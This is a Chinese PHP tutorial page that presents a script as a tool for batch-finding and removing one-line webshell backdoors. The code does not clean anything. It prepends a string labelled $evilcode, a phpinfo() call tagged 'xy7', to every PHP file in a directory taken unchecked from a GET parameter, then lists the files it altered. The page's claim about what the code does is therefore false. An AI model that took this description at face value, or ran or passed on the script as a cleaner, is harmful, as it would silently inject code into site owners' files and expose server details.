当前位置: 首页 > 图文教程 > 网络编程 > PHP > 用php实现批量查询清除一句话后门的代码

PHP
挑战最棒的留言本的源码(三)
php抓即时股票信息
挑战最棒的留言本的源码(四)
使用网络地址转换实现多服务器负载均衡
挑战最棒的留言本的源码(五)
屏蔽浏览器缓存另类方法
PHP脚本数据库功能详解(上)
PHP脚本数据库功能详解(中)
PHP脚本数据库功能详解(下)
一个用mysql_odbc和php写的serach数据库程序
一个简单计数器的源代码
文件上传程序的全部源码
计算2000年01月01日起到指定日的天数
通过文字传递创建的图形按钮
如何在WIN2K下安装PHP4.04
新闻分类录入、显示系统
在字符串中把网址改成超级链接
Php做的端口嗅探器--可以指定网站和端口
不用数据库的多用户文件自由上传投票系统(2)
一个简单的域名注册情况查询程序

PHP 中的 用php实现批量查询清除一句话后门的代码


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 134 ::
收藏到网摘: n/a

一句话后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句话后门的代码,大家可以省去不少麻烦了 总是忘记一句话放到哪个文件里去了,直接全部干掉...
复制代码 代码如下:

<?//xy7
if (!isset($dir) or empty($dir)) {
$dir=str_replace('\\','/',dirname(__FILE__));
echo "<font color=\"#00688B\">".$dir."</font>";
} else {
$dir=$_GET['dir'];
echo "<font color=\"#00688B\">".$dir."</font>";
}
$evilcode="<?phpinfo();//xy7?>";
$testdir = opendir($dir);
while($filea = @readdir($testdir)){
if(strstr($filea, '.php')){
$fp = @fopen($filea, 'r+');
if (!strstr(@fread($fp, 20), 'xy7')){
rewind($fp);
$old = @fread($fp, filesize($filea));
rewind($fp);
fwrite($fp, $evilcode . $old);
}
fclose($fp);
}
}
closedir($testdir);
?>
<hr>
<table width="100%" border="0" cellpadding="3" cellspacing="1">
<tr>
<td><b>被X的文件</b></td>
<td><b>时间</b></td>
<td><b>大小</b></td>
</tr>
<?php
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
if ((is_file($file)) and (ereg("\.php{0,1}$",$file)))
{$b="$dir/$file";
$a=@is_dir($b);
if($a=="0"){
$size=@filesize("$dir/$file");
$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));
echo "<tr>\n";
echo "<td>$file</td>\n";
echo " <td>$lastsave</td>\n";
echo " <td>$size Bytes</td>\n";
}
}
}
@closedir($dirs);
?>
</table>
codz by xuanmumu